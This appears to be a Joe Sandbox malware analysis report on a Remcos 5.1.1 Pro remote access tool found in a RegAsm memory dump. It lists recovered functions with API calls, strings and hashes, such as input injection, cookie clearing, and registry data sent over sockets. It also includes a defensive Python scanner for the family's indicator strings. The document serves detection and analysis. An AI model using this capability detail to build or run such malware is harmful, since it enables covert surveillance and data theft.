                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: tcp$udp
                                          • API String ID: 0-3725065008
                                          • Opcode ID: e3882082d73cb51732241927fa811467e6376eb334e21639ae703d67e169e483
                                          • Instruction ID: 4fb2fbaa1818e082f2863e0a7c91e4ace7fe62ed23b491eff3584b955907a2f3
                                          • Opcode Fuzzy Hash: e3882082d73cb51732241927fa811467e6376eb334e21639ae703d67e169e483
                                          • Instruction Fuzzy Hash: FC7197706083028FDB248F55D4817ABB7E4AFC8355F20482FF88697351E778DE858B9A
                                          APIs
                                          • __Init_thread_footer.LIBCMT ref: 004018BE
                                          • ExitThread.KERNEL32 ref: 004018F6
                                          • waveInUnprepareHeader.WINMM(?,00000020,00000000), ref: 00401A04
                                            • Part of subcall function 00434801: __onexit.LIBCMT ref: 00434807
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ExitHeaderInit_thread_footerThreadUnprepare__onexitwave
                                          • String ID: PkG$XMG$NG$NG
                                          • API String ID: 1649129571-3151166067
                                          • Opcode ID: 6bc7109f93913afa18ffcd4b97c5f76fdcf3f7273101a0b6c5d7a01b90c73acc
                                          • Instruction ID: 94ec9d015e3317cd6a1a8c0f3f0e5257b1b149af30ff9c9aaa6ade548e88cebb
                                          • Opcode Fuzzy Hash: 6bc7109f93913afa18ffcd4b97c5f76fdcf3f7273101a0b6c5d7a01b90c73acc
                                          • Instruction Fuzzy Hash: 7441D5312042109BC324FB26DD96ABE73A6AB85314F00453FF54AA61F2DF386D4AC71D
                                          APIs
                                          • CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000), ref: 00407A00
                                          • WriteFile.KERNEL32(00000000,?,00000000,000186A0,00000000), ref: 00407A48
                                            • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                          • CloseHandle.KERNEL32(00000000), ref: 00407A88
                                          • MoveFileW.KERNEL32 ref: 00407AA5
                                          • CloseHandle.KERNEL32(00000000), ref: 00407AD0
                                          • DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,?,0000000A,00000000), ref: 00407AE0
                                            • Part of subcall function 00404B96: WaitForSingleObject.KERNEL32(00000000,000000FF,?,00474EF8,00404C49,00000000,00000000,00000000,?,00474EF8,?), ref: 00404BA5
                                            • Part of subcall function 00404B96: SetEvent.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040548B), ref: 00404BC3
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: File$CloseHandle$CreateDeleteEventMoveObjectSingleWaitWritesend
                                          • String ID: .part
                                          • API String ID: 1303771098-3499674018
                                          • Opcode ID: f8f352d1944775a3033a6e3b226fb99e3d0dc97036554631b9c7d83676d303e1
                                          • Instruction ID: fa021c15c5d1e87e569c09a19ead990ccf19330fc060556597d24b4305e87d8f
                                          • Opcode Fuzzy Hash: f8f352d1944775a3033a6e3b226fb99e3d0dc97036554631b9c7d83676d303e1
                                          • Instruction Fuzzy Hash: 3A31B571508345AFC310EB61D84599FB3A8FF94359F00493FB945A21D2EB78EE08CB9A
                                          APIs
                                          • AllocConsole.KERNEL32 ref: 0041CE35
                                          • GetConsoleWindow.KERNEL32 ref: 0041CE3B
                                          • ShowWindow.USER32(00000000,00000000), ref: 0041CE4E
                                          • SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041CE73
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Console$Window$AllocOutputShow
                                          • String ID: Remcos v$5.1.1 Pro$CONOUT$
                                          • API String ID: 4067487056-3820604032
                                          • Opcode ID: bb520a2f19826cc6a1c283625bbcfbf44085728638f029a4a140c4eec348b460
                                          • Instruction ID: 6efa3de70d430de9448838496adf33c47162c0890a3ad1875f095e209401f165
                                          • Opcode Fuzzy Hash: bb520a2f19826cc6a1c283625bbcfbf44085728638f029a4a140c4eec348b460
                                          • Instruction Fuzzy Hash: A90144B1A80304BBD610F7F19C8BF9E77AC9B14B05F500527BA04A70D2EB6DD944466E
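The banner pieces in this entry ("Remcos v" and "5.1.1 Pro", written to a hidden console opened on "CONOUT$") together with the markers in the neighbouring entries ("[regsplt]" in the registry enumeration routine, ".part" in the file-download routine) are the quickest way to confirm the family and version in the unpacked RegAsm dump. The scanner below is an added example for this report, not Joe Sandbox code and not code from the sample. It searches a dump buffer for those literals in both ASCII and UTF-16LE, since Win32 string constants may be either, and extracts the version token found shortly after the banner. The sample buffer is constructed, the 512-byte search window and the version pattern are assumptions, and "Pro" is the only edition suffix the report actually shows.

```python
"""Triage scanner for the Remcos string indicators listed in this report.

Added example, not part of the Joe Sandbox report or the analysed sample.
Run against a raw memory dump (e.g. the .sdmp of the RegAsm process) to
confirm the family banner, recover the version token, and list protocol
markers. The dump used in __main__ is constructed for demonstration.
"""
import re
import sys
from dataclasses import dataclass

# Literals taken from the String IDs in the function entries of this report.
BANNER = b"Remcos v"
MARKERS = {
    "console_output": b"CONOUT$",        # hidden console opened by AllocConsole routine
    "registry_split": b"[regsplt]",      # separator used by the registry enumeration routine
    "download_part_suffix": b".part",    # temp suffix used by the file-download routine
}

# Assumption: version is "N.N[.N[.N]]" optionally followed by an edition word.
VERSION_RE = re.compile(rb"\d+(?:\.\d+){1,3}(?: [A-Za-z]+)?")


@dataclass(frozen=True)
class Hit:
    indicator: str
    encoding: str
    offset: int
    value: str


def encodings(literal: bytes):
    """Yield the ASCII and UTF-16LE byte forms of an ASCII literal."""
    yield "ascii", literal
    yield "utf16le", literal.decode("ascii").encode("utf-16-le")


def find_all(buf: bytes, needle: bytes) -> list[int]:
    """Return every offset at which needle occurs in buf (overlaps allowed)."""
    offsets, start = [], 0
    while (i := buf.find(needle, start)) != -1:
        offsets.append(i)
        start = i + 1
    return offsets


def scan(buf: bytes, window: int = 512) -> list[Hit]:
    """Locate banner and marker strings; attach the version token that follows a banner."""
    hits: list[Hit] = []
    for enc, banner in encodings(BANNER):
        for off in find_all(buf, banner):
            # The banner and the version are separate constants in the binary
            # (the report lists them as "Remcos v$5.1.1 Pro"), so look for the
            # version in a bounded window after the banner, same encoding.
            region = buf[off + len(banner): off + len(banner) + window]
            if enc == "utf16le":
                region = region.decode("utf-16-le", errors="ignore").encode("ascii", errors="ignore")
            m = VERSION_RE.search(region)
            hits.append(Hit("banner", enc, off, m.group(0).decode() if m else ""))
    for name, literal in MARKERS.items():
        for enc, needle in encodings(literal):
            for off in find_all(buf, needle):
                hits.append(Hit(name, enc, off, literal.decode()))
    return sorted(hits, key=lambda h: h.offset)


def summarize(hits: list[Hit]) -> dict:
    """Collapse hits into a verdict: banner seen, versions recovered, markers present."""
    found = {h.indicator for h in hits}
    versions = sorted({h.value for h in hits if h.indicator == "banner" and h.value})
    return {
        "family_banner": "banner" in found,
        "versions": versions,
        "markers": sorted(found - {"banner"}),
    }


def constructed_dump() -> bytes:
    """Constructed stand-in for an unpacked image region; NOT the real RegAsm dump."""
    pad = b"\x00" * 16
    return (
        b"MZ" + b"\x90" * 62 + pad
        + b"Remcos v\x00" + pad + b"5.1.1 Pro\x00" + pad
        + b"CONOUT$\x00" + pad
        + "[regsplt]".encode("utf-16-le") + pad
        + ".part".encode("utf-16-le") + pad
    )


if __name__ == "__main__":
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else constructed_dump()
    results = scan(data)
    for h in results:
        print(f"{h.offset:#010x} {h.encoding:8} {h.indicator:22} {h.value}")
    print(summarize(results))
```

A banner hit without a version token, or markers without a banner, is still worth a manual look: the banner is written through a console the sample immediately hides with ShowWindow, so it survives in memory even when the process shows no UI.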
                                          APIs
                                          • SendInput.USER32 ref: 00419A25
                                          • SendInput.USER32(00000001,?,0000001C), ref: 00419A4D
                                          • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419A74
                                          • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419A92
                                          • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419AB2
                                          • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419AD7
                                          • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419AF9
                                          • SendInput.USER32(00000001,00000000,0000001C), ref: 00419B1C
                                            • Part of subcall function 004199CE: MapVirtualKeyA.USER32 ref: 004199D4
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: InputSend$Virtual
                                          • String ID:
                                          • API String ID: 1167301434-0
                                          • Opcode ID: fc4380392ba50379eb6d472fb1d17d58296046c22f58e77cb3b57b5de18c14a3
                                          • Instruction ID: b6cba15de7ba168fc32b54cb564de1fb898aed6d56f2455a0f9f7e0387a20004
                                          • Opcode Fuzzy Hash: fc4380392ba50379eb6d472fb1d17d58296046c22f58e77cb3b57b5de18c14a3
                                          • Instruction Fuzzy Hash: 2431AE71218349A9E220DFA5DC41BDFBBECAF89B44F04080FF58457291CAA49D8C876B
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: __freea$__alloca_probe_16_free
                                          • String ID: a/p$am/pm$h{D
                                          • API String ID: 2936374016-2303565833
                                          • Opcode ID: fd6751c856b69d551333f65899c140b2c90fb7d01a30c867c2f4d7dd71cdc8bb
                                          • Instruction ID: c225e1f32c331ede1d29eb10815d0f52c76e58365e66366979e06629ded2ae5c
                                          • Opcode Fuzzy Hash: fd6751c856b69d551333f65899c140b2c90fb7d01a30c867c2f4d7dd71cdc8bb
                                          • Instruction Fuzzy Hash: 94D1E1719082068AFB299F68C845ABFB7B1EF05300F28455BE501AB351D73D9E43CBA9
                                          APIs
                                            • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                                          • _free.LIBCMT ref: 00444E87
                                          • _free.LIBCMT ref: 00444E9E
                                          • _free.LIBCMT ref: 00444EBD
                                          • _free.LIBCMT ref: 00444ED8
                                          • _free.LIBCMT ref: 00444EEF
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: _free$AllocateHeap
                                          • String ID: KED
                                          • API String ID: 3033488037-2133951994
                                          • Opcode ID: bf8f09c86d4ddf62a61791e98d41f8d125843f3e4b01e4d539fef815b17f4b11
                                          • Instruction ID: 6eb5fd97c930506827bd935ec23fdf2bd7e2f8155051dcdfd38a61b70e77380a
                                          • Opcode Fuzzy Hash: bf8f09c86d4ddf62a61791e98d41f8d125843f3e4b01e4d539fef815b17f4b11
                                          • Instruction Fuzzy Hash: 2351B371A00604ABEB20DF29CC42B6B77F4FF89724B25456EE809D7751E739E901CB98
                                          APIs
                                          • RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 00413AF7
                                          • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00413B26
                                          • RegEnumValueW.ADVAPI32(?,00000000,?,00003FFF,00000000,?,?,00002710), ref: 00413BC6
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Enum$InfoQueryValue
                                          • String ID: [regsplt]$xUG$TG
                                          • API String ID: 3554306468-1165877943
                                          • Opcode ID: 4b0e642b2c48494caa08e7f7a3ba59522f0f548a4503128eeb0998b2f931d829
                                          • Instruction ID: 25111a67c66830bda9a991cbd11294aa9b1843c944dfd5f4caafe5fa1545c2ae
                                          • Opcode Fuzzy Hash: 4b0e642b2c48494caa08e7f7a3ba59522f0f548a4503128eeb0998b2f931d829
                                          • Instruction Fuzzy Hash: 05512D71900219AADB11EB95DC86EEEB77DAF04305F10007AE505B6191EF746B48CBA9
                                          APIs
                                          • GetConsoleCP.KERNEL32 ref: 0044B47E
                                          • __fassign.LIBCMT ref: 0044B4F9
                                          • __fassign.LIBCMT ref: 0044B514
                                          • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 0044B53A
                                          • WriteFile.KERNEL32(?,FF8BC35D,00000000,0044BBB1,00000000), ref: 0044B559
                                          • WriteFile.KERNEL32(?,?,00000001,0044BBB1,00000000), ref: 0044B592
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                          • String ID:
                                          • API String ID: 1324828854-0
                                          • Opcode ID: 311db8d3e4a1a0a231de64f74e89b34bd80b314b172ec9a4a2cdea1eea97895d
                                          • Instruction ID: 262f0c9efa3d8d05c94b564727faad167cb6e35c827a04fe4b8fb241bd644287
                                          • Opcode Fuzzy Hash: 311db8d3e4a1a0a231de64f74e89b34bd80b314b172ec9a4a2cdea1eea97895d
                                          • Instruction Fuzzy Hash: 2151B470A00249AFDB10CFA8D845AEEFBF8EF09304F14456BE955E7291E734D941CBA9
                                          APIs
                                          • GetConsoleCP.KERNEL32 ref: 100094D4
                                          • __fassign.LIBCMT ref: 1000954F
                                          • __fassign.LIBCMT ref: 1000956A
                                          • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 10009590
                                          • WriteFile.KERNEL32(?,?,00000000,10009C07,00000000), ref: 100095AF
                                          • WriteFile.KERNEL32(?,?,00000001,10009C07,00000000), ref: 100095E8
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.913240346.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 0000000C.00000002.913228394.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.913240346.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_10000000_RegAsm.jbxd
                                          Similarity
                                          • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                          • String ID:
                                          • API String ID: 1324828854-0
                                          • Opcode ID: c8cde1f94c5a3c187481f919a86e285046f284bf183baf255f965bcae4dd5098
                                          • Instruction ID: 7b1e32e7ca62d622bc6abd4954a79b3a1191cf35157f5551c2bc05612337e78d
                                          • Opcode Fuzzy Hash: c8cde1f94c5a3c187481f919a86e285046f284bf183baf255f965bcae4dd5098
                                          • Instruction Fuzzy Hash: D7519271D00249AFEB10CFA4CC95BDEBBF8EF09350F15811AE955E7295D731AA41CB60
                                          APIs
                                          • RegOpenKeyExW.ADVAPI32 ref: 00413D81
                                            • Part of subcall function 00413A90: RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 00413AF7
                                            • Part of subcall function 00413A90: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00413B26
                                            • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                          • RegCloseKey.ADVAPI32(00000000), ref: 00413EEF
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CloseEnumInfoOpenQuerysend
                                          • String ID: xUG$NG$NG$TG
                                          • API String ID: 3114080316-2811732169
                                          • Opcode ID: b671a3d148dc4dad6e50aea19cc29b45d172fff4de9eef1f9094f07207dc39cd
                                          • Instruction ID: 39136fa66a1b3d14a29046baa0c8a2124f92290552efa608aac098e6c3039c27
                                          • Opcode Fuzzy Hash: b671a3d148dc4dad6e50aea19cc29b45d172fff4de9eef1f9094f07207dc39cd
                                          • Instruction Fuzzy Hash: 03419F316042005AC324F726D852AEF76A99FD1384F40883FF549671D2EF7C5949866E
                                          APIs
                                          • _ValidateLocalCookies.LIBCMT ref: 1000339B
                                          • ___except_validate_context_record.LIBVCRUNTIME ref: 100033A3
                                          • _ValidateLocalCookies.LIBCMT ref: 10003431
                                          • __IsNonwritableInCurrentImage.LIBCMT ref: 1000345C
                                          • _ValidateLocalCookies.LIBCMT ref: 100034B1
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.913240346.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 0000000C.00000002.913228394.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.913240346.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_10000000_RegAsm.jbxd
                                          Similarity
                                          • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                          • String ID: csm
                                          • API String ID: 1170836740-1018135373
                                          • Opcode ID: 314e045d64bd9dff90e147ebc0021a06731dbc25050b3dab86f6a1545ce1a07e
                                          • Instruction ID: 0a936c430148d26a69835db3fa9f683d01d5328c1142e13f0191aacd949c771e
                                          • Opcode Fuzzy Hash: 314e045d64bd9dff90e147ebc0021a06731dbc25050b3dab86f6a1545ce1a07e
                                          • Instruction Fuzzy Hash: D141D678E042189BEB12CF68C880A9FBBF9EF453A4F10C155E9159F25AD731FA01CB91
                                          APIs
                                            • Part of subcall function 00413656: RegOpenKeyExW.ADVAPI32 ref: 00413678
                                            • Part of subcall function 00413656: RegQueryValueExW.ADVAPI32(?,0040F34E,00000000,00000000,?,00000400), ref: 00413697
                                            • Part of subcall function 00413656: RegCloseKey.ADVAPI32(?), ref: 004136A0
                                            • Part of subcall function 0041C048: GetCurrentProcess.KERNEL32(?,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C059
                                            • Part of subcall function 0041C048: IsWow64Process.KERNEL32(00000000,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C060
                                          • _wcslen.LIBCMT ref: 0041B7F4
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Process$CloseCurrentOpenQueryValueWow64_wcslen
                                          • String ID: .exe$8SG$http\shell\open\command$program files (x86)\$program files\
                                          • API String ID: 3286818993-122982132
                                          • Opcode ID: 426cf9f555deb71152b4ea0aff0bdf5362cc4b7c5296926717e194012261492b
                                          • Instruction ID: 00334f857bbe6022557327a28fa8f115e820bd32ca6b34e50ab8c41aa79dd428
                                          • Opcode Fuzzy Hash: 426cf9f555deb71152b4ea0aff0bdf5362cc4b7c5296926717e194012261492b
                                          • Instruction Fuzzy Hash: 42218872A001046BDB14BAB59CD6AFE766D9B48728F10043FF505B72C3EE3C9D49426D
                                          APIs
                                            • Part of subcall function 004135E1: RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 00413605
                                            • Part of subcall function 004135E1: RegQueryValueExA.KERNEL32 ref: 00413622
                                            • Part of subcall function 004135E1: RegCloseKey.KERNEL32(?), ref: 0041362D
                                          • ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,00000000), ref: 0040BFA6
                                          • PathFileExistsA.SHLWAPI(?), ref: 0040BFB3
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CloseEnvironmentExistsExpandFileOpenPathQueryStringsValue
                                          • String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
                                          • API String ID: 1133728706-4073444585
                                          • Opcode ID: c07787becfdd919c069db1a68e32e5c9d5958318cedaa5e6beefbf099ad8eae3
                                          • Instruction ID: a06d8339010b4a31413dea3cf8b7af81beee50618fccc2c871009a62ab4f9f33
                                          • Opcode Fuzzy Hash: c07787becfdd919c069db1a68e32e5c9d5958318cedaa5e6beefbf099ad8eae3
                                          • Instruction Fuzzy Hash: BC215230A40219A6CB14F7F1CC969EE77299F50744F80017FE502B71D1EB7D6945C6DA
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 4464324db8c5353dfe5ce51150f621231adbafcb5ed67c6bb2f14fac2072150c
                                          • Instruction ID: d4e598e7927038c57750db0ba161657e9615562456f8c919f0676739ef068bdb
                                          • Opcode Fuzzy Hash: 4464324db8c5353dfe5ce51150f621231adbafcb5ed67c6bb2f14fac2072150c
                                          • Instruction Fuzzy Hash: 931127B2504214BBEB216F768C05D1F7A5CEB86726B52062EFD55C7292DA3CCC0186A8
                                          APIs
                                          • CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000), ref: 0041C4C1
                                          • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0041C4DE
                                          • CloseHandle.KERNEL32(00000000), ref: 0041C4EA
                                          • WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0041C4FB
                                          • CloseHandle.KERNEL32(00000000), ref: 0041C508
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: File$CloseHandle$CreatePointerWrite
                                          • String ID: xpF
                                          • API String ID: 1852769593-354647465
                                          • Opcode ID: 03b5af7f289a82a83928ea742180afc1da621273c2f808e1c0dcbcf6c59c1bfa
                                          • Instruction ID: 0233a984b642d2e84dd4fc2cab076f06cd7f632185dc4648213adf39284592b7
                                          • Opcode Fuzzy Hash: 03b5af7f289a82a83928ea742180afc1da621273c2f808e1c0dcbcf6c59c1bfa
                                          • Instruction Fuzzy Hash: 6311E571288215BFE7104A24ACC8EBB739CEB46365F10862BF912D22D0C624DC418639
                                          APIs
                                            • Part of subcall function 00450CC1: _free.LIBCMT ref: 00450CEA
                                          • _free.LIBCMT ref: 00450FC8
                                            • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000), ref: 00446818
                                            • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                          • _free.LIBCMT ref: 00450FD3
                                          • _free.LIBCMT ref: 00450FDE
                                          • _free.LIBCMT ref: 00451032
                                          • _free.LIBCMT ref: 0045103D
                                          • _free.LIBCMT ref: 00451048
                                          • _free.LIBCMT ref: 00451053
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: _free$ErrorFreeHeapLast
                                          • String ID:
                                          • API String ID: 776569668-0
                                          • Opcode ID: 5e629f50e4f6999c0b477f1519b6f3e41be6fc4275a29973627e91760813f884
                                          • Instruction ID: 345e916fd15b447c36d88a7a8914fd19e4c3e0710e9d23c2e9f19f8556552687
                                          • Opcode Fuzzy Hash: 5e629f50e4f6999c0b477f1519b6f3e41be6fc4275a29973627e91760813f884
                                          • Instruction Fuzzy Hash: C111D231402704AAE621BB72CC03FCB779CAF03304F454D2EBEA967153C7ACB4185654
                                          APIs
                                            • Part of subcall function 10009221: _free.LIBCMT ref: 1000924A
                                          • _free.LIBCMT ref: 100092AB
                                            • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000), ref: 10005734
                                            • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                          • _free.LIBCMT ref: 100092B6
                                          • _free.LIBCMT ref: 100092C1
                                          • _free.LIBCMT ref: 10009315
                                          • _free.LIBCMT ref: 10009320
                                          • _free.LIBCMT ref: 1000932B
                                          • _free.LIBCMT ref: 10009336
                                          Memory Dump Source
